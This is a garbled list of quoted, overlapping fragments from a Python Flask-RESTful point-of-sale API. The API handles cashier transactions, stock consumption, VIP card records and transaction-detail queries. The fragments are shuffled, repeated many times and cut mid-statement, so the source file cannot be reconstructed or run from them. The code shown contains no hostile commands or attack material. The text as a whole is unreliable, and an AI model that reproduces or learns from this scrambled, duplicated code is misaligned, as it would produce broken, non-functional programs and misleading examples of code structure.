"trans_dao.start(cashier, cur) # create transaction master record if trans_id < 0: conn.rollback() abort(500,",
"return. If <= 0, return all rows. ''' sql = f''' select T.`id`,",
"sql += ' limit %s' value = (start, count) else: value = (start,)",
"= ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int, count:",
"cur: try: cur.execute(sql, value) result = [row for row in cur] trans_dao._conn.commit() except",
"{ 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4] } for",
"VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return",
"%s' value = (start, count) else: value = (start,) with trans_dao._conn.cursor() as cur:",
"finished with error' }, 406 abort(500, message=f'Unknown error at consume(): {ret}.') # fill",
"row in result ], 200 @auth.login_required def post(self): ''' JSON data format: {",
"for row in result ], 200 @auth.login_required def post(self): ''' JSON data format:",
"'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4] } for row in ret",
"not in data: return { 'reason': 'cashier, trans data must be given!' },",
"trans_dao._conn with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur) # create transaction",
"trans_id: int): sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count`",
"merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret: conn.rollback()",
"}, 406 if ret == 1: return { 'merch_id': merch_id, 'reason': 'Not enough",
"@auth.login_required def get(self, trans_id: int): sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price`",
"0: sql += ' limit %s' value = (start, count) else: value =",
"# create transaction master record if trans_id < 0: conn.rollback() abort(500, message='Failed to",
"'reason': f'Cashier ID {cashier} is illegal!' }, 406 conn = trans_dao._conn with conn.cursor()",
"== -1 or ret == 3: return { 'merch_id': merch_id, 'reason': 'Illegal ID'",
"ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and ret != 1:",
"count, cur) if ret: conn.rollback() if ret == -1 or ret == 3:",
"utf-8 -*- from flask import request from flask_restful import Resource from flask_restful import",
"[ [merch_id: int, actual_price: float, count: int], ... ] } ''' data =",
"}, 406 conn = trans_dao._conn with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier,",
"trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier} not logged in!' }, 406",
"f'Employee {cashier} not logged in!' }, 406 conn.commit() except Exception as e: conn.rollback()",
"count: int], ... ] } ''' data = request.get_json() if 'cashier' not in",
"int): sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count` from",
"def post(self): ''' JSON data format: { 'vip_id': vip_id or None 'cashier': cashier_id:",
"count: int): ''' Arguments --------- start: int count: int Maximum rows to return.",
"trans_items, cur): conn.rollback() abort(500, message='Error occured while filling ' 'transaction details!') # get",
"if trans_id < 0: conn.rollback() abort(500, message='Failed to start transaction!') # consume stored",
"trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500) # update VIP",
"0, return all rows. ''' sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`,",
"by T.`id` order by T.`time` desc ''' if count > 0: sql +=",
"ret: conn.rollback() if ret == -1 or ret == 3: return { 'merch_id':",
"try: cur.execute(sql, value) ret = [row for row in cur] detail_dao._conn.commit() except Exception",
"if ret == 2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout' },",
".Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao",
"for row in cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return",
"message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info if shift_dao.transact_cb(cashier, trans_sum,",
"cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id':",
"= %s and M.`id` = D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as",
"{ 'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if ret == 2:",
"abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info if shift_dao.transact_cb(cashier,",
"406 if ret == 2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout'",
"0 and ret != 1: conn.rollback() if ret == -1: return { 'vip_id':",
"cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id':",
"'transaction details!') # get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if",
"except Exception as e: conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required",
"'reason': 'Invalid VIP ID' }, 406 if ret == 2: return { 'vip_id':",
"E.`id` and T.`id` = D.`trans_id` group by T.`id` order by T.`time` desc '''",
"[ { 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4] }",
"all rows. ''' sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` *",
"as e: conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self,",
"' limit %s' value = (start, count) else: value = (start,) with trans_dao._conn.cursor()",
"data or 'trans' not in data: return { 'reason': 'cashier, trans data must",
"update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier}",
"'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4] } for row",
"in storage' }, 406 if ret == 2: return { 'merch_id': merch_id, 'reason':",
"trans_sum is None: conn.rollback() abort(500) # update VIP card info if vip_id is",
"{ 'reason': 'cashier, trans data must be given!' }, 406 cashier, trans_items =",
"f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T,",
"406 abort(500, message=f'Unknown error at consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id,",
"value = (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret = [row",
"from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` = %s and M.`id`",
"406 if ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished with",
"record if trans_id < 0: conn.rollback() abort(500, message='Failed to start transaction!') # consume",
"cur: try: cur.execute(sql, value) ret = [row for row in cur] detail_dao._conn.commit() except",
"shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int,",
"def get(self, start: int, count: int): ''' Arguments --------- start: int count: int",
"''' Arguments --------- start: int count: int Maximum rows to return. If <=",
"int): ''' Arguments --------- start: int count: int Maximum rows to return. If",
"VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao =",
"Maximum rows to return. If <= 0, return all rows. ''' sql =",
"rows to return. If <= 0, return all rows. ''' sql = f'''",
"fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while filling",
"trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result = [row for row in cur]",
"D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id`",
"# get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is",
"Exception as e: conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def",
"post(self): ''' JSON data format: { 'vip_id': vip_id or None 'cashier': cashier_id: int,",
"select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}`",
"406 conn = trans_dao._conn with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur)",
"} ''' data = request.get_json() if 'cashier' not in data or 'trans' not",
"e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]),",
"detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret = [row for row in cur]",
"float(row[4]) } for row in result ], 200 @auth.login_required def post(self): ''' JSON",
"''' if count > 0: sql += ' limit %s' value = (start,",
"from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >=",
"trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2],",
"abort(500, message=str(e)) return [ { 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]),",
"D where D.`trans_id` = %s and M.`id` = D.`merch_id` ''' value = (trans_id,)",
"if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while filling ' 'transaction details!')",
"# update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee",
"{ 'reason': f'Employee {cashier} not logged in!' }, 406 conn.commit() except Exception as",
"transaction!') # consume stored merchandise for merch_id, _, count in trans_items: ret =",
"'merch_id': merch_id, 'reason': 'Not enough in storage' }, 406 if ret == 2:",
"2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406 abort(500, message='Unknown",
"if ret: conn.rollback() if ret == -1 or ret == 3: return {",
"card timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update",
"as cur: try: cur.execute(sql, value) ret = [row for row in cur] detail_dao._conn.commit()",
"TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao",
"}, 406 conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return '', 200",
"1: return { 'merch_id': merch_id, 'reason': 'Not enough in storage' }, 406 if",
"= D.`trans_id` group by T.`id` order by T.`time` desc ''' if count >",
"rows. ''' sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`)",
"'trans' not in data: return { 'reason': 'cashier, trans data must be given!'",
"%H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row in result ],",
"shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier} not logged in!' },",
"to return. If <= 0, return all rows. ''' sql = f''' select",
"from flask_restful import Resource from flask_restful import abort import decimal as D from",
"'cashier': cashier_id: int, 'trans': [ [merch_id: int, actual_price: float, count: int], ... ]",
"406 cashier, trans_items = data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id' in data",
"else: value = (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result =",
"consume stored merchandise for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count,",
"update VIP card info if vip_id is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum,",
"!= 0 and ret != 1: conn.rollback() if ret == -1: return {",
"or 'trans' not in data: return { 'reason': 'cashier, trans data must be",
"if count > 0: sql += ' limit %s' value = (start, count)",
"vip_id, 'reason': 'Invalid VIP ID' }, 406 if ret == 2: return {",
"!= 1: conn.rollback() if ret == -1: return { 'vip_id': vip_id, 'reason': 'Invalid",
"row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row",
"JSON data format: { 'vip_id': vip_id or None 'cashier': cashier_id: int, 'trans': [",
"{ 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406 abort(500, message='Unknown error at",
"filling ' 'transaction details!') # get sum of current transaction trans_sum = detail_dao.get_sum(trans_id,",
"auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao()",
"-1 or ret == 3: return { 'merch_id': merch_id, 'reason': 'Illegal ID' },",
"row[3], 'sum': float(row[4]) } for row in result ], 200 @auth.login_required def post(self):",
"200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql = f''' select D.`merch_id`,",
"'trans': [ [merch_id: int, actual_price: float, count: int], ... ] } ''' data",
"import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao =",
"conn.rollback() if ret == -1 or ret == 3: return { 'merch_id': merch_id,",
"cur: try: trans_id = trans_dao.start(cashier, cur) # create transaction master record if trans_id",
"int Maximum rows to return. If <= 0, return all rows. ''' sql",
"_, count in trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if",
"orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` = %s",
"be given!' }, 406 cashier, trans_items = data['cashier'], data['trans'] vip_id = data['vip_id'] if",
"D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret",
"or None 'cashier': cashier_id: int, 'trans': [ [merch_id: int, actual_price: float, count: int],",
"e: conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id:",
"return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql = f'''",
"viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and ret != 1: conn.rollback() if",
"abort import decimal as D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from",
"message=str(e)) return [ { 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count':",
"VIP card info if vip_id is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur)",
"}, 406 if ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished",
"row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4] } for row in ret ]",
"transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500) # update",
"'reason': f'Employee {cashier} not logged in!' }, 406 conn.commit() except Exception as e:",
"actual_price: float, count: int], ... ] } ''' data = request.get_json() if 'cashier'",
"= f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}` as",
"as e: trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'),",
"error' }, 406 abort(500, message=f'Unknown error at consume(): {ret}.') # fill transaction details",
"T.`id` order by T.`time` desc ''' if count > 0: sql += '",
"return { 'merch_id': merch_id, 'reason': 'Not enough in storage' }, 406 if ret",
"in data or 'trans' not in data: return { 'reason': 'cashier, trans data",
"D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where",
"try: cur.execute(sql, value) result = [row for row in cur] trans_dao._conn.commit() except Exception",
"vip_id, 'reason': 'VIP card timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db():",
"# consume stored merchandise for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id,",
"as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >= %s and",
"is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and",
"if ret == -1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID' },",
"data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id' in data else None if not",
"M.`id` = D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql,",
"return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum':",
"EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start:",
"''' JSON data format: { 'vip_id': vip_id or None 'cashier': cashier_id: int, 'trans':",
"import Resource from flask_restful import abort import decimal as D from db import",
"error at consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback()",
"row in cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [",
"message='Failed to start transaction!') # consume stored merchandise for merch_id, _, count in",
"sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback()",
"if ret == -1 or ret == 3: return { 'merch_id': merch_id, 'reason':",
"given!' }, 406 cashier, trans_items = data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id'",
"M, `{detail_dao._table}` as D where D.`trans_id` = %s and M.`id` = D.`merch_id` '''",
"or ret == 3: return { 'merch_id': merch_id, 'reason': 'Illegal ID' }, 406",
"detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id': row[0],",
"data else None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is",
"cur): conn.rollback() abort(500, message='Error occured while filling ' 'transaction details!') # get sum",
"data = request.get_json() if 'cashier' not in data or 'trans' not in data:",
"T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}`",
"T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as",
"data['trans'] vip_id = data['vip_id'] if 'vip_id' in data else None if not employ_dao.has_id(cashier):",
"D.`trans_id` group by T.`id` order by T.`time` desc ''' if count > 0:",
"get(self, start: int, count: int): ''' Arguments --------- start: int count: int Maximum",
"shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier} not",
"VIP ID' }, 406 if ret == 2: return { 'vip_id': vip_id, 'reason':",
"T.`id` >= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id` group by",
"return all rows. ''' sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price`",
"start: int count: int Maximum rows to return. If <= 0, return all",
"= f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as",
"as D where T.`id` >= %s and T.`cashier` = E.`id` and T.`id` =",
"{ 'vip_id': vip_id or None 'cashier': cashier_id: int, 'trans': [ [merch_id: int, actual_price:",
"`{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >= %s",
"f'Cashier ID {cashier} is illegal!' }, 406 conn = trans_dao._conn with conn.cursor() as",
"== 3: return { 'merch_id': merch_id, 'reason': 'Illegal ID' }, 406 if ret",
"''' sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from",
"while filling ' 'transaction details!') # get sum of current transaction trans_sum =",
"TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql = f''' select D.`merch_id`, M.`name`, D.`price`,",
"and T.`cashier` = E.`id` and T.`id` = D.`trans_id` group by T.`id` order by",
"%s and M.`id` = D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as cur:",
"for row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return",
"value = (start, count) else: value = (start,) with trans_dao._conn.cursor() as cur: try:",
"viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int): '''",
"with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result = [row for row in",
"2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished with error' }, 406 abort(500,",
"with error' }, 406 abort(500, message=f'Unknown error at consume(): {ret}.') # fill transaction",
"abort(500, message='Error occured while filling ' 'transaction details!') # get sum of current",
"return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if ret ==",
"message=f'Unknown error at consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items, cur):",
"int, actual_price: float, count: int], ... ] } ''' data = request.get_json() if",
"with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret = [row for row in",
"and ret != 1: conn.rollback() if ret == -1: return { 'vip_id': vip_id,",
"= data['vip_id'] if 'vip_id' in data else None if not employ_dao.has_id(cashier): return {",
"'vip_id': vip_id or None 'cashier': cashier_id: int, 'trans': [ [merch_id: int, actual_price: float,",
"-1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if ret",
"'cashier, trans data must be given!' }, 406 cashier, trans_items = data['cashier'], data['trans']",
"f'.transact_db(): {ret}.') # update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return {",
"< 0: conn.rollback() abort(500, message='Failed to start transaction!') # consume stored merchandise for",
"at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback()",
"result ], 200 @auth.login_required def post(self): ''' JSON data format: { 'vip_id': vip_id",
"with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur) # create transaction master",
"ID' }, 406 if ret == 2: return { 'vip_id': vip_id, 'reason': 'VIP",
"conn.rollback() abort(500, message='Error occured while filling ' 'transaction details!') # get sum of",
"M.`name`, D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D",
"TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao =",
"count: int Maximum rows to return. If <= 0, return all rows. '''",
"trans_id < 0: conn.rollback() abort(500, message='Failed to start transaction!') # consume stored merchandise",
"{ 'reason': f'Cashier ID {cashier} is illegal!' }, 406 conn = trans_dao._conn with",
"card info if vip_id is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if",
"'merch_id': merch_id, 'reason': 'Illegal ID' }, 406 if ret == 1: return {",
"'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row in",
"ret = merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if ret == -1 or",
"406 if ret == 1: return { 'merch_id': merch_id, 'reason': 'Not enough in",
"} for row in result ], 200 @auth.login_required def post(self): ''' JSON data",
"as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id': row[0], 'name': row[1], 'actual_price':",
"from .Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao()",
"trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id': row[0],",
"except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id': row[0], 'time':",
"= request.get_json() if 'cashier' not in data or 'trans' not in data: return",
"[merch_id: int, actual_price: float, count: int], ... ] } ''' data = request.get_json()",
"where D.`trans_id` = %s and M.`id` = D.`merch_id` ''' value = (trans_id,) with",
"None 'cashier': cashier_id: int, 'trans': [ [merch_id: int, actual_price: float, count: int], ...",
"= TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao =",
"'VIP card timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') #",
"`{detail_dao._table}` as D where D.`trans_id` = %s and M.`id` = D.`merch_id` ''' value",
"row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row in result",
"data format: { 'vip_id': vip_id or None 'cashier': cashier_id: int, 'trans': [ [merch_id:",
"{cashier} is illegal!' }, 406 conn = trans_dao._conn with conn.cursor() as cur: try:",
"int], ... ] } ''' data = request.get_json() if 'cashier' not in data",
"detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price':",
"(start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result = [row for row",
"trans data must be given!' }, 406 cashier, trans_items = data['cashier'], data['trans'] vip_id",
"+= ' limit %s' value = (start, count) else: value = (start,) with",
"1: conn.rollback() if ret == -1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP",
"message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql =",
"MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao()",
"flask import request from flask_restful import Resource from flask_restful import abort import decimal",
"E, `{detail_dao._table}` as D where T.`id` >= %s and T.`cashier` = E.`id` and",
"vip_id = data['vip_id'] if 'vip_id' in data else None if not employ_dao.has_id(cashier): return",
"Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d",
"= detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500) # update VIP card",
"else None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is illegal!'",
"return { 'reason': 'cashier, trans data must be given!' }, 406 cashier, trans_items",
"as M, `{detail_dao._table}` as D where D.`trans_id` = %s and M.`id` = D.`merch_id`",
"count in trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if ret",
"vip_id is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0",
"cashier_id: int, 'trans': [ [merch_id: int, actual_price: float, count: int], ... ] }",
"value) ret = [row for row in cur] detail_dao._conn.commit() except Exception as e:",
"error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur):",
"`{detail_dao._table}` as D where T.`id` >= %s and T.`cashier` = E.`id` and T.`id`",
"200 @auth.login_required def post(self): ''' JSON data format: { 'vip_id': vip_id or None",
"= trans_dao._conn with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur) # create",
"db import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao =",
"info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier} not logged",
"from flask import request from flask_restful import Resource from flask_restful import abort import",
"get(self, trans_id: int): sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price,",
"group by T.`id` order by T.`time` desc ''' if count > 0: sql",
"trans_sum, cur) if ret != 0 and ret != 1: conn.rollback() if ret",
"employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is illegal!' }, 406 conn =",
"class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql = f''' select D.`merch_id`, M.`name`,",
"and M.`id` = D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as cur: try:",
"trans_items = data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id' in data else None",
"if not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is illegal!' }, 406",
"transaction master record if trans_id < 0: conn.rollback() abort(500, message='Failed to start transaction!')",
"= (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result = [row for",
"406 conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return '', 200 class",
"trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if ret == -1",
"}, 406 if ret == 2: return { 'vip_id': vip_id, 'reason': 'VIP card",
"= TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource):",
"'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for",
"as cur: try: trans_id = trans_dao.start(cashier, cur) # create transaction master record if",
"row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row in result ], 200 @auth.login_required",
"info if vip_id is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret",
"limit %s' value = (start, count) else: value = (start,) with trans_dao._conn.cursor() as",
"'reason': 'VIP card timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.')",
"except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id': row[0], 'name':",
"and T.`id` = D.`trans_id` group by T.`id` order by T.`time` desc ''' if",
"{ 'merch_id': merch_id, 'reason': 'UPDATE finished with error' }, 406 abort(500, message=f'Unknown error",
"EmployeeDao from db import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao()",
"in data else None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier}",
"@auth.login_required def get(self, start: int, count: int): ''' Arguments --------- start: int count:",
"desc ''' if count > 0: sql += ' limit %s' value =",
"ret = [row for row in cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback()",
"> 0: sql += ' limit %s' value = (start, count) else: value",
"-*- from flask import request from flask_restful import Resource from flask_restful import abort",
"if ret != 0 and ret != 1: conn.rollback() if ret == -1:",
"not logged in!' }, 406 conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e))",
"value) result = [row for row in cur] trans_dao._conn.commit() except Exception as e:",
"flask_restful import abort import decimal as D from db import MerchandiseDao, TransactionDao, TransDetailDao,",
"<= 0, return all rows. ''' sql = f''' select T.`id`, T.`time`, T.`cashier`,",
"{ 'merch_id': merch_id, 'reason': 'Not enough in storage' }, 406 if ret ==",
"return { 'merch_id': merch_id, 'reason': 'UPDATE finished with error' }, 406 abort(500, message=f'Unknown",
"return { 'merch_id': merch_id, 'reason': 'Illegal ID' }, 406 if ret == 1:",
"== 2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished with error' }, 406",
"db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao from .Auth",
"= data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id' in data else None if",
"conn.rollback() if ret == -1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID'",
